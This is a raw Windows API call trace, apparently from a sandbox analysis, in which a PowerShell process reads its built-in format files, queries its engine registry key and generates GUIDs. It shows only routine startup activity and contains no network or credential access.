	[0671.291] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.291] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.292] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.293] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.294] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.294] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.294] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.295] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.295] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.295] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.295] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.298] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.298] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.299] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.299] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.299] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0xe67, lpOverlapped=0x0) returned 1
	[0671.300] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6297, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6297*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0671.300] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0671.300] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x31c) returned 0x0
	[0671.300] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0671.300] CoTaskMemAlloc (cb=0x5a) returned 0x1b3114a0
	[0671.300] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b3114a0, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0671.301] CoTaskMemFree (pv=0x1b3114a0) 
	[0671.301] RegCloseKey (hKey=0x31c) returned 0x0
	[0671.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0671.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0671.303] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xa2e62ab3, Data2=0x7cbb, Data3=0x4dfa, Data4=([0]=0x86, [1]=0xc9, [2]=0x9a, [3]=0xd1, [4]=0xc5, [5]=0x7b, [6]=0xd8, [7]=0x80))) returned 0x0
	[0671.303] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x7fce8e46, Data2=0xdbb1, Data3=0x47e9, Data4=([0]=0xaf, [1]=0x37, [2]=0x18, [3]=0x34, [4]=0x1c, [5]=0xd9, [6]=0x13, [7]=0x8f))) returned 0x0
	[0671.303] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xfd14344d, Data2=0x3230, Data3=0x4aaa, Data4=([0]=0xa8, [1]=0x50, [2]=0x46, [3]=0x3a, [4]=0xc7, [5]=0x8a, [6]=0x26, [7]=0xc6))) returned 0x0
	[0671.303] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xfabd629b, Data2=0x8016, Data3=0x4267, Data4=([0]=0x9b, [1]=0xea, [2]=0xf4, [3]=0xf8, [4]=0xaf, [5]=0xdb, [6]=0x80, [7]=0x4e))) returned 0x0
	[0671.303] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x1c7cb99d, Data2=0x8feb, Data3=0x41a5, Data4=([0]=0xb1, [1]=0x41, [2]=0xcd, [3]=0x6f, [4]=0xfd, [5]=0xe2, [6]=0x36, [7]=0xf9))) returned 0x0
	[0671.304] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x5dbe9f08, Data2=0xce58, Data3=0x49aa, Data4=([0]=0xa1, [1]=0x5e, [2]=0xec, [3]=0x29, [4]=0xac, [5]=0x92, [6]=0x86, [7]=0xa4))) returned 0x0
	[0671.304] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x6e26a699, Data2=0x7a, Data3=0x43a0, Data4=([0]=0x8a, [1]=0x94, [2]=0xf2, [3]=0x55, [4]=0x8e, [5]=0x59, [6]=0xff, [7]=0xfc))) returned 0x0
	[0671.304] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xc1f0a7b0, Data2=0xe2b0, Data3=0x4fb7, Data4=([0]=0x9c, [1]=0x91, [2]=0xe3, [3]=0x1a, [4]=0x4, [5]=0xdb, [6]=0x94, [7]=0x25))) returned 0x0
	[0671.304] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xab469b00, Data2=0x32f7, Data3=0x42f5, Data4=([0]=0xae, [1]=0x87, [2]=0x8a, [3]=0xe8, [4]=0xf6, [5]=0xbf, [6]=0xe7, [7]=0xd1))) returned 0x0
	[0671.305] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xe25791d1, Data2=0xa74e, Data3=0x4cad, Data4=([0]=0x8e, [1]=0xaf, [2]=0xde, [3]=0xe4, [4]=0xc8, [5]=0x23, [6]=0xcf, [7]=0x65))) returned 0x0
	[0671.305] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x4a0c4097, Data2=0x5f69, Data3=0x42d7, Data4=([0]=0x84, [1]=0xd9, [2]=0x52, [3]=0xc8, [4]=0xb2, [5]=0x87, [6]=0xbf, [7]=0xdf))) returned 0x0
	[0671.305] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x58c31d9d, Data2=0x5585, Data3=0x42e0, Data4=([0]=0xb6, [1]=0x2e, [2]=0x7a, [3]=0x61, [4]=0x2, [5]=0xc3, [6]=0xf3, [7]=0x47))) returned 0x0
	[0671.305] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xcfc08ca5, Data2=0x266e, Data3=0x4e0e, Data4=([0]=0x84, [1]=0x81, [2]=0xf7, [3]=0x90, [4]=0xd2, [5]=0xe1, [6]=0x8f, [7]=0x26))) returned 0x0
	[0671.305] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xa1d469da, Data2=0x3c1c, Data3=0x46fa, Data4=([0]=0xa1, [1]=0xaa, [2]=0xb9, [3]=0x60, [4]=0x34, [5]=0xc2, [6]=0xb3, [7]=0x1e))) returned 0x0
	[0671.305] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x24735d92, Data2=0x6bf, Data3=0x4038, Data4=([0]=0xaa, [1]=0xee, [2]=0x30, [3]=0x36, [4]=0x7, [5]=0x4b, [6]=0xcc, [7]=0x20))) returned 0x0
	[0671.306] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xc8bc6bdf, Data2=0xea10, Data3=0x461f, Data4=([0]=0x95, [1]=0xe2, [2]=0x2, [3]=0xa8, [4]=0xee, [5]=0x31, [6]=0xbc, [7]=0x28))) returned 0x0
	[0671.306] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x6d232533, Data2=0xe33f, Data3=0x43dc, Data4=([0]=0xbf, [1]=0x55, [2]=0x4, [3]=0x0, [4]=0x17, [5]=0x84, [6]=0x42, [7]=0x3a))) returned 0x0
	[0671.306] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x7d2aa0e0, Data2=0xb9d3, Data3=0x4eef, Data4=([0]=0x9f, [1]=0x7d, [2]=0x1b, [3]=0xae, [4]=0xed, [5]=0xdd, [6]=0x6f, [7]=0xc1))) returned 0x0
	[0671.306] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x4f1863c2, Data2=0x799, Data3=0x4b15, Data4=([0]=0xb0, [1]=0xbd, [2]=0xfc, [3]=0x33, [4]=0x75, [5]=0xd4, [6]=0xf9, [7]=0xb5))) returned 0x0
	[0671.307] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x16ea5d96, Data2=0x561f, Data3=0x4466, Data4=([0]=0x8c, [1]=0x8d, [2]=0xaf, [3]=0x9, [4]=0x60, [5]=0x89, [6]=0x8e, [7]=0xd7))) returned 0x0
	[0671.307] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x293ed2fd, Data2=0x5ab6, Data3=0x401f, Data4=([0]=0xb1, [1]=0xc5, [2]=0xdd, [3]=0x8c, [4]=0x5c, [5]=0x52, [6]=0xd0, [7]=0x94))) returned 0x0
	[0671.307] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb5fddd5c, Data2=0xfe4a, Data3=0x4d6b, Data4=([0]=0xb0, [1]=0x6a, [2]=0x5, [3]=0x45, [4]=0x56, [5]=0xc8, [6]=0x5, [7]=0x61))) returned 0x0
	[0671.307] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2473f5e9, Data2=0x7ef9, Data3=0x40cb, Data4=([0]=0x95, [1]=0x60, [2]=0x1, [3]=0xc3, [4]=0xb1, [5]=0xfb, [6]=0x80, [7]=0x5d))) returned 0x0
	[0671.307] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2cd6360a, Data2=0xc574, Data3=0x4141, Data4=([0]=0x85, [1]=0x11, [2]=0xea, [3]=0x60, [4]=0x5, [5]=0x9c, [6]=0x70, [7]=0x56))) returned 0x0
	[0671.307] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x5627a9f, Data2=0x7c41, Data3=0x4ac1, Data4=([0]=0x9d, [1]=0xe1, [2]=0x2a, [3]=0xa7, [4]=0x4b, [5]=0x50, [6]=0x2f, [7]=0xf1))) returned 0x0
	[0671.308] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x3dd88454, Data2=0x4541, Data3=0x4ff7, Data4=([0]=0xab, [1]=0xf5, [2]=0xb, [3]=0x8, [4]=0x6b, [5]=0xc1, [6]=0x45, [7]=0x72))) returned 0x0
	[0671.308] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xaf1ddc2f, Data2=0xb23a, Data3=0x4793, Data4=([0]=0x98, [1]=0x1e, [2]=0x41, [3]=0xe2, [4]=0x55, [5]=0x95, [6]=0xa1, [7]=0x98))) returned 0x0
	[0671.308] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xab8ae8d1, Data2=0x1466, Data3=0x4f80, Data4=([0]=0x82, [1]=0x55, [2]=0xd2, [3]=0x69, [4]=0xb9, [5]=0xab, [6]=0x21, [7]=0x21))) returned 0x0
	[0671.308] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x185ef9b6, Data2=0x3fc3, Data3=0x4a0f, Data4=([0]=0xa3, [1]=0x56, [2]=0x82, [3]=0x32, [4]=0x35, [5]=0xc5, [6]=0xd1, [7]=0x3a))) returned 0x0
	[0671.308] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x92534cf, Data2=0xca2f, Data3=0x4721, Data4=([0]=0x9a, [1]=0x8c, [2]=0x44, [3]=0xd1, [4]=0xe0, [5]=0x84, [6]=0xed, [7]=0x75))) returned 0x0
	[0671.309] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x78d78529, Data2=0xc9f4, Data3=0x4a3a, Data4=([0]=0x9b, [1]=0xaa, [2]=0xe5, [3]=0x3d, [4]=0x62, [5]=0x5c, [6]=0x56, [7]=0x9a))) returned 0x0
	[0671.309] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xa0c57163, Data2=0x638c, Data3=0x42a4, Data4=([0]=0xb3, [1]=0x8d, [2]=0xe5, [3]=0x94, [4]=0x2a, [5]=0x8d, [6]=0x1d, [7]=0x36))) returned 0x0
	[0671.309] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x9616d252, Data2=0x530a, Data3=0x4914, Data4=([0]=0xb5, [1]=0x54, [2]=0x32, [3]=0x8c, [4]=0x98, [5]=0x18, [6]=0x80, [7]=0xa7))) returned 0x0
	[0671.315] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x49b92c94, Data2=0xf1a9, Data3=0x4ac3, Data4=([0]=0x9d, [1]=0x3, [2]=0x72, [3]=0xf0, [4]=0x12, [5]=0xf5, [6]=0x4b, [7]=0x91))) returned 0x0
	[0671.315] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x3b56ea2, Data2=0x7afb, Data3=0x42ba, Data4=([0]=0xad, [1]=0x5b, [2]=0x7e, [3]=0xfa, [4]=0x9e, [5]=0x25, [6]=0x9e, [7]=0x18))) returned 0x0
	[0671.316] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2ffa442d, Data2=0xfcf8, Data3=0x4b79, Data4=([0]=0xbc, [1]=0x6a, [2]=0x51, [3]=0xb4, [4]=0xd5, [5]=0xc, [6]=0x5f, [7]=0x20))) returned 0x0
	[0671.316] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xf6065e1b, Data2=0x3c54, Data3=0x4b90, Data4=([0]=0x83, [1]=0xb4, [2]=0x36, [3]=0xb8, [4]=0x26, [5]=0xd2, [6]=0x86, [7]=0x64))) returned 0x0
	[0671.316] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x250e4d3, Data2=0x308d, Data3=0x4460, Data4=([0]=0xb4, [1]=0x19, [2]=0x24, [3]=0x7f, [4]=0x7a, [5]=0x5d, [6]=0x82, [7]=0xc9))) returned 0x0
	[0671.316] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xf956e46a, Data2=0x4c9f, Data3=0x4705, Data4=([0]=0xae, [1]=0xd1, [2]=0x4, [3]=0x80, [4]=0xf7, [5]=0x7e, [6]=0xfa, [7]=0xc7))) returned 0x0
	[0671.316] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x5be7e9b5, Data2=0x4a09, Data3=0x4e59, Data4=([0]=0x85, [1]=0x5, [2]=0x98, [3]=0x23, [4]=0xc0, [5]=0x96, [6]=0x83, [7]=0xc))) returned 0x0
	[0671.316] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xc01a1ad0, Data2=0xce72, Data3=0x47eb, Data4=([0]=0x95, [1]=0x9d, [2]=0xa, [3]=0x7f, [4]=0xda, [5]=0x21, [6]=0x7b, [7]=0x3a))) returned 0x0
	[0671.317] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x8be78596, Data2=0x823f, Data3=0x46bb, Data4=([0]=0xbf, [1]=0x82, [2]=0x5a, [3]=0xea, [4]=0x91, [5]=0xdf, [6]=0xd7, [7]=0x9f))) returned 0x0
	[0671.317] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x1106c2f6, Data2=0x6e39, Data3=0x4524, Data4=([0]=0xb4, [1]=0x55, [2]=0x6b, [3]=0xda, [4]=0x73, [5]=0x4b, [6]=0x52, [7]=0x69))) returned 0x0
	[0671.317] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x1de5a14e, Data2=0x3fe9, Data3=0x458d, Data4=([0]=0x9c, [1]=0x6e, [2]=0x38, [3]=0xa6, [4]=0xa4, [5]=0xb9, [6]=0x52, [7]=0x3b))) returned 0x0
	[0671.317] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x44657e7c, Data2=0xdf65, Data3=0x472f, Data4=([0]=0xa6, [1]=0x86, [2]=0x21, [3]=0xf4, [4]=0x4d, [5]=0xe4, [6]=0x9c, [7]=0xc2))) returned 0x0
	[0671.317] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x3f64894, Data2=0xe7ac, Data3=0x437c, Data4=([0]=0xad, [1]=0x56, [2]=0x78, [3]=0x1c, [4]=0x60, [5]=0xe7, [6]=0xb9, [7]=0xb0))) returned 0x0
	[0671.318] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb46a83f2, Data2=0x81a, Data3=0x48b1, Data4=([0]=0xa7, [1]=0xca, [2]=0xf4, [3]=0x81, [4]=0x55, [5]=0x3f, [6]=0xfc, [7]=0xf2))) returned 0x0
	[0672.813] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x80ac8cd6, Data2=0x8c4c, Data3=0x4ea8, Data4=([0]=0xa4, [1]=0xd2, [2]=0xf8, [3]=0x4a, [4]=0x96, [5]=0xaa, [6]=0x40, [7]=0x2b))) returned 0x0
	[0672.813] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0672.814] GetFileType (hFile=0x31c) returned 0x1
	[0672.814] SetErrorMode (uMode=0x1) returned 0x1
	[0672.814] GetFileType (hFile=0x31c) returned 0x1
	[0672.814] ReadFile (in: hFile=0x31c, lpBuffer=0x3334c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3334c60*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.814] ReadFile (in: hFile=0x31c, lpBuffer=0x3334c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3334c60*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.814] ReadFile (in: hFile=0x31c, lpBuffer=0x3334c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3334c60*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.814] ReadFile (in: hFile=0x31c, lpBuffer=0x3334c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3334c60*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.815] ReadFile (in: hFile=0x31c, lpBuffer=0x3334c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3334c60*, lpNumberOfBytesRead=0x10d458*=0x8b4, lpOverlapped=0x0) returned 1
	[0672.815] ReadFile (in: hFile=0x31c, lpBuffer=0x333407c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x333407c*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0672.815] ReadFile (in: hFile=0x31c, lpBuffer=0x3334c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3334c60*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0672.815] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x31c) returned 0x0
	[0672.815] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0672.815] CoTaskMemAlloc (cb=0x5a) returned 0x1b3114a0
	[0672.815] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b3114a0, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0672.816] CoTaskMemFree (pv=0x1b3114a0) 
	[0672.816] RegCloseKey (hKey=0x31c) returned 0x0
	[0672.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0672.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0672.816] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x472bf7c1, Data2=0x19e, Data3=0x49be, Data4=([0]=0x89, [1]=0x7d, [2]=0x41, [3]=0xd4, [4]=0xca, [5]=0x23, [6]=0xe, [7]=0xf5))) returned 0x0
	[0672.816] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xf2e8d5d3, Data2=0x1e85, Data3=0x4e0e, Data4=([0]=0x8b, [1]=0xac, [2]=0x8b, [3]=0x6, [4]=0x60, [5]=0x16, [6]=0x9f, [7]=0xc))) returned 0x0
	[0672.817] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0672.817] GetFileType (hFile=0x31c) returned 0x1
	[0672.817] SetErrorMode (uMode=0x1) returned 0x1
	[0672.817] GetFileType (hFile=0x31c) returned 0x1
	[0672.817] ReadFile (in: hFile=0x31c, lpBuffer=0x3372a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3372a48*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.817] ReadFile (in: hFile=0x31c, lpBuffer=0x3372a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3372a48*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.817] ReadFile (in: hFile=0x31c, lpBuffer=0x3372a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3372a48*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.818] ReadFile (in: hFile=0x31c, lpBuffer=0x3372a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3372a48*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0672.819] ReadFile (in: hFile=0x31c, lpBuffer=0x3372a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3372a48*, lpNumberOfBytesRead=0x10d458*=0xe98, lpOverlapped=0x0) returned 1
	[0672.819] ReadFile (in: hFile=0x31c, lpBuffer=0x3372048, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3372048*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0672.819] ReadFile (in: hFile=0x31c, lpBuffer=0x3372a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3372a48*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
